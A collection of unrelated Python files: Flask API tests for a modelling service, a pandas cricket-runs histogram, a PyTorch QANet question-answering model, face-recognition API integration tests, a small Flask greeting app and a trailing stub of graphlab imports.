def test_model_run(client, model_run):
    """GET a single model run by name."""
    name = model_run["name"]
    resp = client.get("/api/v1/model_runs/{}".format(name))
    current_app.config.data_interface.read_model_run.assert_called_with(name)
    assert resp.status_code == 200
    assert parse_json(resp)["data"] == model_run
def test_model_run_missing(client):
    """GET an unknown model run reports SmifDataNotFoundError."""
    body = parse_json(client.get("/api/v1/model_runs/does_not_exist"))
    assert body["error"]["SmifDataNotFoundError"] == [
        "model_run 'does_not_exist' not found"
    ]
def test_post_model_run(client, model_run):
    """POST a new model run to the collection."""
    model_run["name"] = "test_post_model_run"
    resp = client.post(
        "/api/v1/model_runs/",
        data=serialise_json(model_run),
        content_type="application/json",
    )
    current_app.config.data_interface.write_model_run.assert_called_with(model_run)
    assert resp.status_code == 201
    assert parse_json(resp)["message"] == "success"
def test_put_model_run(client, model_run):
    """PUT an updated model run."""
    resp = client.put(
        "/api/v1/model_runs/" + model_run["name"],
        data=serialise_json(model_run),
        content_type="application/json",
    )
    current_app.config.data_interface.update_model_run.assert_called_with(
        model_run["name"], model_run
    )
    assert resp.status_code == 200
def test_delete_model_run(client, model_run):
    """DELETE removes the named model run via the store."""
    resp = client.delete(
        "/api/v1/model_runs/" + model_run["name"],
        data=serialise_json(model_run),
        content_type="application/json",
    )
    current_app.config.data_interface.delete_model_run.assert_called_with(
        model_run["name"]
    )
    assert resp.status_code == 200
def test_start_model_run(client):
    """POST to the start endpoint schedules the run with its args."""
    args = {"verbosity": 0, "warm_start": False, "output_format": "local_csv"}
    resp = client.post(
        "/api/v1/model_runs/20170918_energy_water/start",
        data=serialise_json({"args": args}),
        content_type="application/json",
    )
    call = current_app.config.scheduler.add.call_args
    assert call[0][0] == "20170918_energy_water"
    assert call[0][1]["verbosity"] == 0
    assert call[0][1]["warm_start"] is False
    assert call[0][1]["output_format"] == "local_csv"
    assert resp.status_code == 201
    assert parse_json(resp)["message"] == "success"
def test_kill_model_run(client):
    """POST model run KILL"""
    # Kill a model_run
    response = client.post(
        "/api/v1/model_runs/20170918_energy_water/kill",
        data={},
        content_type="application/json",
    )
    data = parse_json(response)
    assert response.status_code == 201
    assert data["message"] == "success"
    current_app.config.scheduler.kill.assert_called_with("20170918_energy_water")
def test_get_modelrun_status_modelrun_never_started(client):
    """The status endpoint reports 'unstarted' before any start."""
    resp = client.get("/api/v1/model_runs/model_never_started/status")
    assert resp.status_code == 200
    assert parse_json(resp)["data"]["status"] == "unstarted"
def test_get_modelrun_status_modelrun_running(client):
    """The status endpoint reports 'running' for an in-flight run."""
    resp = client.get("/api/v1/model_runs/model_started_and_running/status")
    assert resp.status_code == 200
    assert parse_json(resp)["data"]["status"] == "running"
def test_get_modelrun_status_modelrun_done(client):
    """The status endpoint reports 'done' after a successful run."""
    resp = client.get("/api/v1/model_runs/model_started_and_done/status")
    assert resp.status_code == 200
    assert parse_json(resp)["data"]["status"] == "done"
def test_get_sos_models(client, get_sos_model):
    """GET all system-of-systems models"""
    response = client.get("/api/v1/sos_models/")
    # BUG FIX: `.called == 1` compared a bool to 1 and passes for any
    # number of calls; assert the exact call count instead.
    assert current_app.config.data_interface.read_sos_models.call_count == 1
    assert response.status_code == 200
    data = parse_json(response)
    assert data["data"] == [get_sos_model]
def test_get_sos_model(client, get_sos_model):
    """GET a single system-of-systems model by name."""
    name = get_sos_model["name"]
    resp = client.get("/api/v1/sos_models/{}".format(name))
    current_app.config.data_interface.read_sos_model.assert_called_with(name)
    assert resp.status_code == 200
    assert parse_json(resp)["data"] == get_sos_model
def test_get_sos_model_missing(client):
    """GET an unknown sos model reports SmifDataNotFoundError."""
    body = parse_json(client.get("/api/v1/sos_models/does_not_exist"))
    assert body["error"]["SmifDataNotFoundError"] == [
        "sos_model 'does_not_exist' not found"
    ]
def test_post_sos_model(client, get_sos_model):
    """POST system-of-systems model"""
    name = "test_post_sos_model"
    get_sos_model["name"] = name
    send = serialise_json(get_sos_model)
    response = client.post(
        "/api/v1/sos_models/", data=send, content_type="application/json"
    )
    # BUG FIX: `.called == 1` compared a bool to 1 and passes for any
    # number of calls; assert the exact call count instead.
    assert current_app.config.data_interface.write_sos_model.call_count == 1
    data = parse_json(response)
    assert response.status_code == 201
    assert data["message"] == "success"
def test_put_sos_model(client, get_sos_model):
    """PUT an updated sos model."""
    resp = client.put(
        "/api/v1/sos_models/" + get_sos_model["name"],
        data=serialise_json(get_sos_model),
        content_type="application/json",
    )
    current_app.config.data_interface.update_sos_model.assert_called_with(
        get_sos_model["name"], get_sos_model
    )
    assert resp.status_code == 200
def test_delete_sos_model(client, get_sos_model):
    """DELETE removes the named sos model via the store."""
    resp = client.delete(
        "/api/v1/sos_models/" + get_sos_model["name"],
        data=serialise_json(get_sos_model),
        content_type="application/json",
    )
    current_app.config.data_interface.delete_sos_model.assert_called_with(
        get_sos_model["name"]
    )
    assert resp.status_code == 200
def test_get_sector_models(client, get_sector_model):
    """GET all sector models"""
    response = client.get("/api/v1/sector_models/")
    # BUG FIX: `.called == 1` compared a bool to 1 and passes for any
    # number of calls; assert the exact call count instead.
    assert current_app.config.data_interface.read_models.call_count == 1
    assert response.status_code == 200
    data = parse_json(response)
    assert data["data"] == [get_sector_model]
def test_get_sector_model(client, get_sector_model):
    """GET single sector model"""
    name = get_sector_model["name"]
    response = client.get("/api/v1/sector_models/{}".format(name))
    current_app.config.data_interface.read_model.assert_called_with(
        name, skip_coords=True
    )
    # CONSISTENCY FIX: sibling single-GET tests also assert the status code.
    assert response.status_code == 200
    data = parse_json(response)
    assert data["data"] == get_sector_model
def test_get_sector_model_missing(client):
    """GET an unknown sector model reports SmifDataNotFoundError."""
    body = parse_json(client.get("/api/v1/sector_models/does_not_exist"))
    assert body["error"]["SmifDataNotFoundError"] == [
        "sector_model 'does_not_exist' not found"
    ]
def test_post_sector_model(client, get_sector_model):
    """POST a new sector model."""
    get_sector_model["name"] = "test_post_sector_model"
    resp = client.post(
        "/api/v1/sector_models/",
        data=serialise_json(get_sector_model),
        content_type="application/json",
    )
    current_app.config.data_interface.write_model.assert_called_with(get_sector_model)
    assert resp.status_code == 201
    assert parse_json(resp)["message"] == "success"
def test_put_sector_model(client, get_sector_model):
    """PUT an updated sector model."""
    resp = client.put(
        "/api/v1/sector_models/" + get_sector_model["name"],
        data=serialise_json(get_sector_model),
        content_type="application/json",
    )
    current_app.config.data_interface.update_model.assert_called_with(
        get_sector_model["name"], get_sector_model
    )
    assert resp.status_code == 200
def test_delete_sector_model(client, get_sector_model):
    """DELETE removes the named sector model via the store."""
    resp = client.delete(
        "/api/v1/sector_models/" + get_sector_model["name"],
        data=serialise_json(get_sector_model),
        content_type="application/json",
    )
    current_app.config.data_interface.delete_model.assert_called_with(
        get_sector_model["name"]
    )
    assert resp.status_code == 200
def test_get_scenarios(client, get_scenario):
    """GET all scenarios"""
    response = client.get("/api/v1/scenarios/")
    # BUG FIX: `.called == 1` compared a bool to 1 and passes for any
    # number of calls; assert the exact call count instead.
    assert current_app.config.data_interface.read_scenarios.call_count == 1
    assert response.status_code == 200
    data = parse_json(response)
    assert data["data"] == [get_scenario]
def test_get_scenario(client, get_scenario):
    """GET a single scenario by name."""
    name = get_scenario["name"]
    resp = client.get("/api/v1/scenarios/{}".format(name))
    current_app.config.data_interface.read_scenario.assert_called_with(
        name, skip_coords=True
    )
    assert resp.status_code == 200
    assert parse_json(resp)["data"] == get_scenario
def test_get_scenario_missing(client):
    """GET an unknown scenario reports SmifDataNotFoundError."""
    body = parse_json(client.get("/api/v1/scenarios/does_not_exist"))
    assert body["error"]["SmifDataNotFoundError"] == [
        "scenario 'does_not_exist' not found"
    ]
def test_post_scenario(client, get_scenario):
    """POST a new scenario."""
    get_scenario["name"] = "test_post_scenario"
    resp = client.post(
        "/api/v1/scenarios/",
        data=serialise_json(get_scenario),
        content_type="application/json",
    )
    current_app.config.data_interface.write_scenario.assert_called_with(get_scenario)
    assert resp.status_code == 201
    assert parse_json(resp)["message"] == "success"
def test_delete_scenario(client, get_scenario):
    """DELETE removes the named scenario via the store."""
    resp = client.delete(
        "/api/v1/scenarios/" + get_scenario["name"],
        data=serialise_json(get_scenario),
        content_type="application/json",
    )
    current_app.config.data_interface.delete_scenario.assert_called_with(
        get_scenario["name"]
    )
    assert resp.status_code == 200
def test_put_scenario(client, get_scenario):
    """PUT an updated scenario."""
    resp = client.put(
        "/api/v1/scenarios/" + get_scenario["name"],
        data=serialise_json(get_scenario),
        content_type="application/json",
    )
    current_app.config.data_interface.update_scenario.assert_called_with(
        get_scenario["name"], get_scenario
    )
    assert resp.status_code == 200
def test_get_dimensions(client, get_dimension):
    """GET all dimensions"""
    response = client.get("/api/v1/dimensions/")
    # BUG FIX: `.called == 1` compared a bool to 1 and passes for any
    # number of calls; assert the exact call count instead.
    assert current_app.config.data_interface.read_dimensions.call_count == 1
    assert response.status_code == 200
    data = parse_json(response)
    assert data["data"] == [get_dimension]
def test_get_dimension(client, get_dimension):
    """GET a single dimension by name."""
    name = get_dimension["name"]
    resp = client.get("/api/v1/dimensions/{}".format(name))
    current_app.config.data_interface.read_dimension.assert_called_with(
        name, skip_coords=True
    )
    assert resp.status_code == 200
    assert parse_json(resp)["data"] == get_dimension
def test_get_dimension_missing(client):
    """GET an unknown dimension reports SmifDataNotFoundError."""
    body = parse_json(client.get("/api/v1/dimensions/does_not_exist"))
    assert body["error"]["SmifDataNotFoundError"] == [
        "dimension 'does_not_exist' not found"
    ]
def test_post_dimension(client, get_dimension):
    """POST a new dimension."""
    get_dimension["name"] = "test_post_dimension"
    resp = client.post(
        "/api/v1/dimensions/",
        data=serialise_json(get_dimension),
        content_type="application/json",
    )
    current_app.config.data_interface.write_dimension.assert_called_with(get_dimension)
    assert resp.status_code == 201
    assert parse_json(resp)["message"] == "success"
def test_put_dimension(client, get_dimension):
    """PUT an updated dimension."""
    resp = client.put(
        "/api/v1/dimensions/" + get_dimension["name"],
        data=serialise_json(get_dimension),
        content_type="application/json",
    )
    current_app.config.data_interface.update_dimension.assert_called_with(
        get_dimension["name"], get_dimension
    )
    assert resp.status_code == 200
def test_delete_dimension(client, get_dimension):
    """DELETE removes the named dimension via the store."""
    resp = client.delete(
        "/api/v1/dimensions/" + get_dimension["name"],
        data=serialise_json(get_dimension),
        content_type="application/json",
    )
    current_app.config.data_interface.delete_dimension.assert_called_with(
        get_dimension["name"]
    )
    assert resp.status_code == 200
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Load the IPL ball-by-ball dataset once at module import.
ipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)
# Solution
def plot_innings_runs_histogram():
    """Show a histogram of total runs per match, one series per inning."""
    per_match = ipl_df.pivot_table(
        'runs', aggfunc=np.sum, index='match_code', columns='inning')
    per_match.plot.hist(histtype='bar')
    plt.show()
|
# Implementation of QANet based on https://github.com/andy840314/QANet-pytorch-
#
# @article{yu2018qanet,
# title={Qanet: Combining local convolution with global self-attention for reading comprehension},
# author={Yu, Adams Wei and Dohan, David and Luong, Minh-Thang and Zhao, Rui and Chen, Kai and Norouzi, Mohammad and Le, Quoc V},
# journal={arXiv preprint arXiv:1804.09541},
# year={2018}
# }
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from dlex.configs import AttrDict
from dlex.torch.models.base import BaseModel
from dlex.torch.utils.ops_utils import maybe_cuda
from dlex.torch.utils.variable_length_tensor import get_mask
from torch.nn.modules.activation import MultiheadAttention
from ..datasets import QABatch, QADataset
def mask_logits(inputs, mask):
    """Add a large negative bias (-1e30) where mask == 0, so a subsequent
    softmax assigns those positions ~zero probability."""
    keep = mask.type(torch.float32)
    return inputs + (-1e30) * (1 - keep)
class InitializedConv1d(nn.Module):
    """Conv1d with Kaiming init (when followed by ReLU) or Xavier init."""
    def __init__(self, in_channels, out_channels, kernel_size=1, relu=False, stride=1, padding=0, groups=1, bias=False):
        super().__init__()
        self.out = nn.Conv1d(
            in_channels, out_channels, kernel_size,
            stride=stride, padding=padding, groups=groups, bias=bias)
        self.relu = relu
        # Pick the initialisation that matches the activation regime.
        if relu:
            nn.init.kaiming_normal_(self.out.weight, nonlinearity='relu')
        else:
            nn.init.xavier_uniform_(self.out.weight)
    def forward(self, x):
        y = self.out(x)
        if self.relu:
            y = F.relu(y)
        return y
def PosEncoder(x, min_timescale=1.0, max_timescale=1.0e4):
    """Add sinusoidal positional encodings to x, given as (batch, channels, length)."""
    xt = x.transpose(1, 2)
    length, channels = xt.size(1), xt.size(2)
    signal = get_timing_signal(length, channels, min_timescale, max_timescale)
    return (xt + maybe_cuda(signal)).transpose(1, 2)
def get_timing_signal(length, channels, min_timescale=1.0, max_timescale=1.0e4):
    """Return the transformer sinusoid table of shape (1, length, channels)."""
    positions = torch.arange(length).type(torch.float32)
    half = channels // 2
    # Geometric progression of timescales between min and max.
    log_increment = (math.log(float(max_timescale) / float(min_timescale)) / (float(half) - 1))
    timescales = min_timescale * torch.exp(
        torch.arange(half).type(torch.float32) * -log_increment)
    angles = positions.unsqueeze(1) * timescales.unsqueeze(0)
    table = torch.cat([torch.sin(angles), torch.cos(angles)], dim=1)
    # Pad one zero column when channels is odd.
    table = nn.ZeroPad2d((0, (channels % 2), 0, 0))(table)
    return table.view(1, length, channels)
class DepthwiseSeparableConv(nn.Module):
    """Depthwise (per-channel, kernel k) conv then 1x1 pointwise conv + ReLU."""
    def __init__(self, in_ch, out_ch, k, bias=True):
        super().__init__()
        self.depthwise_conv = nn.Conv1d(
            in_ch, in_ch, kernel_size=k, groups=in_ch, padding=k // 2, bias=False)
        self.pointwise_conv = nn.Conv1d(in_ch, out_ch, kernel_size=1, padding=0, bias=bias)
    def forward(self, x):
        depth = self.depthwise_conv(x)
        return F.relu(self.pointwise_conv(depth))
class Highway(nn.Module):
    """Stack of highway layers: x = g * dropout(W x) + (1 - g) * x."""
    def __init__(self, layer_num: int, size, dropout):
        super().__init__()
        self.n = layer_num
        self.linear = nn.ModuleList(
            [InitializedConv1d(size, size, relu=False, bias=True) for _ in range(layer_num)])
        self.gate = nn.ModuleList(
            [InitializedConv1d(size, size, bias=True) for _ in range(layer_num)])
        self.dropout = nn.Dropout(dropout)
    def forward(self, x):
        for transform, gate_layer in zip(self.linear, self.gate):
            g = torch.sigmoid(gate_layer(x))
            h = self.dropout(transform(x))
            x = g * h + (1 - g) * x
        return x
class SelfAttention(nn.Module):
    """Multi-head self-attention over (batch, dim, length) inputs."""
    def __init__(self, connector_dim, num_heads, dropout):
        super().__init__()
        self.num_heads = num_heads
        self.attn = MultiheadAttention(
            embed_dim=connector_dim, num_heads=num_heads, dropout=dropout)
    def forward(self, query, mask):
        # MultiheadAttention expects (length, batch, dim).
        seq_first = query.permute(2, 0, 1)
        attended, _ = self.attn(
            seq_first, seq_first, seq_first, key_padding_mask=mask)
        return attended.permute(1, 2, 0)
class Embedding(nn.Module):
    """QANet input embedding: fuse character- and word-level embeddings.

    Assumes char_emb is (batch, word_len, char_len, char_dim) and word_emb
    is (batch, word_len, word_dim), based on the permutes/transposes below
    -- TODO confirm against the dataset.
    """
    def __init__(self, connector_dim, word_dim, char_dim, dropout, dropout_char):
        super().__init__()
        self.conv2d = nn.Conv2d(char_dim, connector_dim, kernel_size=(1, 7), padding=0, bias=True)
        nn.init.kaiming_normal_(self.conv2d.weight, nonlinearity='relu')
        self.conv1d = InitializedConv1d(word_dim + connector_dim, connector_dim, bias=False)
        self.high = Highway(2, connector_dim, dropout)
        self.dropout_word = nn.Dropout(dropout)
        self.dropout_char = nn.Dropout(dropout_char)
    def forward(self, char_emb, word_emb, length):
        char_emb = char_emb.permute(0, 3, 1, 2)
        char_emb = self.dropout_char(char_emb)
        char_emb = self.conv2d(char_emb)
        char_emb = F.relu(char_emb)
        # torch.max over dim 3 drops that dim, leaving (batch, dim, word_len).
        char_emb, _ = torch.max(char_emb, dim=3)
        # BUG FIX: removed the bare `char_emb.squeeze()` here -- it was a
        # no-op for normal batches but wrongly dropped the batch dimension
        # whenever batch_size == 1.
        word_emb = self.dropout_word(word_emb)
        word_emb = word_emb.transpose(1, 2)
        emb = torch.cat([char_emb, word_emb], dim=1)
        emb = self.conv1d(emb)
        emb = self.high(emb)
        return emb
class EncoderBlock(nn.Module):
    """QANet encoder block: positional encoding, `conv_num_layers` depthwise
    separable convolutions, multi-head self-attention, then a two-layer
    feed-forward net -- each sublayer wrapped in pre-layer-norm residuals
    with depth-scaled stochastic layer dropout."""
    def __init__(
            self,
            conv_num_layers: int,
            conv_num_filters: int,
            kernel_size: int,
            connector_dim: int,
            num_heads: int,
            dropout):
        super().__init__()
        self.convs = nn.ModuleList([DepthwiseSeparableConv(
            conv_num_filters, conv_num_filters, kernel_size
        ) for _ in range(conv_num_layers)])
        self.self_att = SelfAttention(connector_dim, num_heads, dropout)
        self.FFN_1 = InitializedConv1d(conv_num_filters, conv_num_filters, relu=True, bias=True)
        self.FFN_2 = InitializedConv1d(conv_num_filters, conv_num_filters, bias=True)
        self.norm_C = nn.ModuleList([nn.LayerNorm(connector_dim) for _ in range(conv_num_layers)])
        self.norm_1 = nn.LayerNorm(connector_dim)
        self.norm_2 = nn.LayerNorm(connector_dim)
        self.conv_num_layers = conv_num_layers
        self.dropout_p = dropout
        self.dropout = nn.Dropout(dropout)
    def forward(self, x, mask, l, num_blocks):
        # `l` is the global sublayer index across all blocks; the layer
        # dropout rate ramps linearly with depth (l / total_layers).
        total_layers = (self.conv_num_layers + 1) * num_blocks
        out = PosEncoder(x)
        for i, conv in enumerate(self.convs):
            res = out
            # Pre-norm: LayerNorm expects the channel dim last, hence the
            # transpose round-trip.
            out = self.norm_C[i](out.transpose(1, 2)).transpose(1, 2)
            # Regular dropout only on every other conv sublayer.
            if i % 2 == 0:
                out = self.dropout(out)
            out = conv(out)
            out = self.layer_dropout(out, res, self.dropout_p * float(l) / total_layers)
            l += 1
        res = out
        out = self.norm_1(out.transpose(1, 2)).transpose(1, 2)
        out = self.dropout(out)
        out = self.self_att(out, mask)
        out = self.layer_dropout(out, res, self.dropout_p * float(l) / total_layers)
        l += 1
        res = out
        out = self.norm_2(out.transpose(1, 2)).transpose(1, 2)
        out = self.dropout(out)
        out = self.FFN_1(out)
        out = self.FFN_2(out)
        out = self.layer_dropout(out, res, self.dropout_p * float(l) / total_layers)
        return out
    def layer_dropout(self, inputs, residual, dropout):
        """Stochastic depth: during training, with probability *dropout*
        skip the sublayer entirely; otherwise apply dropout and add the
        residual. At eval time it is a plain residual connection."""
        if self.training:
            pred = torch.empty(1).uniform_(0, 1) < dropout
            if pred:
                return residual
            else:
                return self.dropout(inputs) + residual
        else:
            return inputs + residual
class ContextQueryAttention(nn.Module):
    """Context-query (bidirectional) attention layer (QANet / BiDAF style).

    Builds a trilinear similarity matrix S between every context and query
    word, derives context-to-query (A) and query-to-context (B) summaries,
    and returns the concatenation [C, A, C*A, C*B].
    """

    def __init__(self, connector_dim, dropout):
        super().__init__()
        # Trilinear weights: per-channel weights for C, for Q, and for the
        # elementwise C⊙Q interaction, plus a scalar bias.
        wC = torch.empty(connector_dim, 1)
        wQ = torch.empty(connector_dim, 1)
        wQC = torch.empty(1, 1, connector_dim)
        bias = torch.empty(1)
        nn.init.xavier_uniform_(wC)
        nn.init.xavier_uniform_(wQ)
        nn.init.xavier_uniform_(wQC)
        nn.init.constant_(bias, 0)
        self.wC = nn.Parameter(wC)
        self.wQ = nn.Parameter(wQ)
        self.wQC = nn.Parameter(wQC)
        self.bias = nn.Parameter(bias)
        self.dropout = nn.Dropout(dropout)

    def forward(self, C, Q, maskC, maskQ):
        """C: (batch, dim, Lc); Q: (batch, dim, Lq); masks mark real tokens.

        Returns the attended representation of shape (batch, 4*dim, Lc).
        """
        C = C.transpose(1, 2)  # B * context_max_length * emb_dim
        Q = Q.transpose(1, 2)
        batch_size = C.shape[0]
        S = self.trilinear(C, Q)  # (batch, Lc, Lq) similarity scores
        maskC = maskC.view(batch_size, C.shape[1], 1)
        maskQ = maskQ.view(batch_size, 1, Q.shape[1])
        # context-to-query attention
        S1 = F.softmax(mask_logits(S, maskQ), dim=2)
        A = torch.bmm(S1, Q)
        # query-to-context attention
        S2 = F.softmax(mask_logits(S, maskC), dim=1)
        B = torch.bmm(torch.bmm(S1, S2.transpose(1, 2)), C)
        out = torch.cat([C, A, torch.mul(C, A), torch.mul(C, B)], dim=2)
        return out.transpose(1, 2)

    def trilinear(self, C, Q):
        """
        Trilinear function (Seo et. al, 2016)
        :param C:
        :param Q:
        :return: similarities between each pair of context and query words
        $f(q, c) = W_0 [q, c, q \odot c]$
        """
        C = self.dropout(C)
        Q = self.dropout(Q)
        # Three additive terms, each broadcast to (batch, Lc, Lq).
        res = torch.matmul(C, self.wC).expand([-1, -1, Q.shape[1]]) + \
            torch.matmul(Q, self.wQ).transpose(1, 2).expand([-1, C.shape[1], -1]) + \
            torch.matmul(C * self.wQC, Q.transpose(1, 2)) + \
            self.bias
        return res
class Pointer(nn.Module):
    """Output layer: produces start/end span logits from the three
    model-encoder outputs, masking out padded positions."""

    def __init__(self, dim):
        super().__init__()
        self.w1 = InitializedConv1d(dim * 2, 1)
        self.w2 = InitializedConv1d(dim * 2, 1)

    def forward(self, M1, M2, M3, mask):
        """Return (start_logits, end_logits) for the answer span."""
        start_features = torch.cat([M1, M2], dim=1)
        end_features = torch.cat([M1, M3], dim=1)
        start_logits = mask_logits(self.w1(start_features).squeeze(), mask)
        end_logits = mask_logits(self.w2(end_features).squeeze(), mask)
        return start_logits, end_logits
class QANet(BaseModel):
    """QANet model for extractive question answering.

    Pipeline: input embedding -> shared embedding encoder -> context-query
    attention -> three passes through a shared stack of model-encoder
    blocks -> start/end span pointers.
    """

    def __init__(self, params: AttrDict, dataset: QADataset):
        super().__init__(params, dataset)
        cfg = self.configs
        # input embedding layer
        self.emb_word = dataset.word_embedding_layer
        self.emb_char = nn.Embedding(len(dataset.vocab_char), cfg.input_embedding.char_dim)
        self.emb = Embedding(cfg.connector_dim, dataset.word_dim, dataset.char_dim, cfg.dropout, cfg.dropout_char)
        # embedding encoder layer (shared between context and question)
        self.emb_enc = EncoderBlock(
            conv_num_layers=cfg.embedding_encoder.conv_num_layers,
            conv_num_filters=cfg.connector_dim,
            kernel_size=cfg.embedding_encoder.conv_kernel_size,
            connector_dim=cfg.connector_dim,
            num_heads=cfg.embedding_encoder.num_heads or cfg.num_heads,
            dropout=cfg.dropout)
        # context-query attention layer
        self.cq_att = ContextQueryAttention(
            connector_dim=cfg.connector_dim,
            dropout=cfg.dropout)
        # projects the 4*dim attention output back to connector_dim
        self.cq_resizer = InitializedConv1d(cfg.connector_dim * 4, cfg.connector_dim)
        # model encoder layer (one stack, reused for all three passes)
        self.encoder_blocks = nn.ModuleList([
            EncoderBlock(
                conv_num_layers=cfg.model_encoder.conv_num_layers,
                conv_num_filters=cfg.connector_dim,
                kernel_size=cfg.model_encoder.conv_kernel_size,
                connector_dim=cfg.connector_dim,
                num_heads=cfg.model_encoder.num_heads or cfg.num_heads,
                dropout=cfg.dropout
            ) for _ in range(cfg.model_encoder.num_blocks)])
        # output layer
        self.out = Pointer(cfg.connector_dim)
        self.dropout = nn.Dropout(cfg.dropout)

    def forward(self, batch):
        """Return (start_logits, end_logits) over context positions."""
        cfg = self.params.model
        context_word, context_word_lengths, context_char, question_word, question_word_lengths, question_char = batch.X
        # input embedding layer
        maskC = get_mask(context_word_lengths)
        maskQ = get_mask(question_word_lengths)
        Cw = self.emb_word(context_word)
        Cc = self.emb_char(context_char)
        Qw = self.emb_word(question_word)
        Qc = self.emb_char(question_char)
        C = self.emb(Cc, Cw, Cw.shape[1])
        Q = self.emb(Qc, Qw, Qw.shape[1])
        # embedding encoder layer
        # NOTE(review): encoders receive the inverted mask (~mask), which
        # suggests get_mask returns True for real tokens while the attention
        # key_padding_mask wants True for padding — confirm.
        Ce = self.emb_enc(C, ~maskC, 1, 1)
        Qe = self.emb_enc(Q, ~maskQ, 1, 1)
        # context-query attention layer
        X = self.cq_att(Ce, Qe, maskC.float(), maskQ.float())
        M = self.cq_resizer(X)
        M = F.dropout(M, p=cfg.dropout, training=self.training)
        # model encoder layer: three passes through the SAME blocks
        # (weight sharing); M0/M1/M2 feed the span pointer.
        # The sub-layer offset i * (2 + 2) + 1 assumes 2 convs + attention +
        # FFN per block, i.e. model_encoder.conv_num_layers == 2 — TODO confirm.
        for i, block in enumerate(self.encoder_blocks):
            M = block(M, ~maskC, i * (2 + 2) + 1, cfg.model_encoder.num_blocks)
        M0 = M
        M = self.dropout(M)
        for i, block in enumerate(self.encoder_blocks):
            M = block(M, ~maskC, i * (2 + 2) + 1, cfg.model_encoder.num_blocks)
        M1 = M
        M = self.dropout(M)
        for i, block in enumerate(self.encoder_blocks):
            M = block(M, ~maskC, i * (2 + 2) + 1, cfg.model_encoder.num_blocks)
        M2 = M
        # output layer
        p1, p2 = self.out(M0, M1, M2, maskC.float())
        return p1, p2

    def get_loss(self, batch: QABatch, output):
        """Sum of cross-entropy losses for start and end positions."""
        p1, p2 = output
        y1, y2 = batch.Y[:, 0], batch.Y[:, 1]
        return F.cross_entropy(p1, y1) + F.cross_entropy(p2, y2)

    def infer(self, batch: QABatch):
        """Greedy decoding: argmax start/end per example.

        Returns (pred, ref, None, None) where pred/ref are lists of
        [start, end] index pairs.
        """
        p1, p2 = self.forward(batch)
        p1 = torch.argmax(p1, -1).tolist()
        p2 = torch.argmax(p2, -1).tolist()
        y1, y2 = batch.Y[:, 0].tolist(), batch.Y[:, 1].tolist()
        pred = list(map(list, zip(*[p1, p2])))
        ref = list(map(list, zip(*[y1, y2])))
        return pred, ref, None, None
|
import unittest
from CONSTANTS import FACE_API_KEY, FACE_BASE_URL
from face.FaceAPIWrapper import FaceAPIWrapper
class TestFaceAPIWrapper(unittest.TestCase):
    """Integration tests for FaceAPIWrapper against the live Face API.

    setUpClass builds a fresh person group with ten training images of one
    person and trains it; tests then verify identification and group CRUD.
    Requires valid FACE_API_KEY / FACE_BASE_URL and network access.
    """

    @classmethod
    def setUpClass(cls):
        super(TestFaceAPIWrapper, cls).setUpClass()
        key = FACE_API_KEY
        base_url = FACE_BASE_URL
        # Training set: ten images of the same person.
        image_urls = ['images/Peter_Hook/train/1.jpg',
                      'images/Peter_Hook/train/2.jpg',
                      'images/Peter_Hook/train/3.jpg',
                      'images/Peter_Hook/train/4.jpg',
                      'images/Peter_Hook/train/5.jpg',
                      'images/Peter_Hook/train/6.jpg',
                      'images/Peter_Hook/train/7.jpg',
                      'images/Peter_Hook/train/8.jpg',
                      'images/Peter_Hook/train/9.jpg',
                      'images/Peter_Hook/train/10.jpg',
                      ]
        cls.person_group = 'bassist'
        cls.person_name = 'Peter Hook'
        cls.face_api = FaceAPIWrapper(key, base_url)
        # Delete first so reruns start from a clean group.
        cls.face_api.delete_group(cls.person_group)
        cls.face_api.create_group(cls.person_group)
        cls.person_id = cls.face_api.create_person(person_group=cls.person_group, person_name=cls.person_name)
        for image_url in image_urls:
            cls.face_api.add_faces_to_person(person_group=cls.person_group, person_id=cls.person_id,
                                             image_url=image_url)
        cls.face_api.train_group(cls.person_group)

    def test_correct_identification_same_persons(self):
        """A held-out image of the trained person should match person_id."""
        # NOTE(review): lowercase 'Peter_hook' differs from the 'Peter_Hook'
        # casing used in setUpClass — verify on a case-sensitive filesystem.
        test_image = 'images/Peter_hook/test/11.jpg'
        face_ids = self.face_api.detect_faces(image=test_image)
        identified_person_id = \
            self.face_api.identify_faces(face_ids=face_ids,
                                         large_person_group=self.person_group) or " "
        self.assertEqual(identified_person_id, self.person_id)

    def test_correct_identification_different_persons(self):
        """An image of someone else must not match person_id."""
        test_image_2 = 'images/detection1.jpg'
        face_ids = self.face_api.detect_faces(image=test_image_2)
        identified_person_id = \
            self.face_api.identify_faces(face_ids=face_ids,
                                         large_person_group=self.person_group) or " "
        self.assertNotEqual(identified_person_id, self.person_id)

    def test_create_group(self):
        """A created group must appear in list_groups()."""
        self.face_api.delete_group("random_test_group")
        self.face_api.create_group("random_test_group")
        groups = self.face_api.list_groups()
        # Format [{'largePersonGroupId': 'allowed_persons', 'name': 'allowed_persons', 'userData': None},]
        found = False
        for group in groups:
            found = 'random_test_group' in group['largePersonGroupId'] or 'random_test_group' in group['name']
            if found:
                break
        self.assertTrue(found)
        self.face_api.delete_group("random_test_group")

    def test_delete_group(self):
        """A deleted group must no longer appear in list_groups()."""
        self.face_api.create_group("random_test_group")
        self.face_api.delete_group("random_test_group")
        groups = self.face_api.list_groups()
        # Format [{'largePersonGroupId': 'allowed_persons', 'name': 'allowed_persons', 'userData': None},]
        found = False
        for group in groups:
            found = 'random_test_group' in group['largePersonGroupId'] or 'random_test_group' in group['name']
            if found:
                break
        self.assertFalse(found)

    def tearDown(self):
        # Basic rate limiting
        import time
        time.sleep(30)

    @classmethod
    def tearDownClass(cls):
        # Remove the trained group so reruns and other suites start clean.
        super(TestFaceAPIWrapper, cls).tearDownClass()
        cls.face_api.delete_group(cls.person_group)


if __name__ == '__main__':
    unittest.main()
|
from flask import Flask
import os
PORT = 8080

# Read the greeting target from the environment.
# BUGFIX: the original used os.environ['NAME'], which raises KeyError when
# the variable is unset (the `name == None` check could never trigger).
# Fall back to "world" for a missing or empty value.
name = os.environ.get("NAME")
if not name:
    name = "world"

MESSAGE = "Good morning, " + name + "!"
print("Message: '" + MESSAGE + "'")
app = Flask(__name__)


@app.route("/")
def root():
    """Serve the precomputed greeting as UTF-8 bytes."""
    print("Handling web request. Returning message.")
    result = MESSAGE.encode("utf-8")
    return result


if __name__ == "__main__":
    # Listen on all interfaces; debug=True is for development only.
    app.run(debug=True, host="0.0.0.0", port=PORT)
|
import graphlab
import pickle
from graphlab import aggregate as agg
import itertools
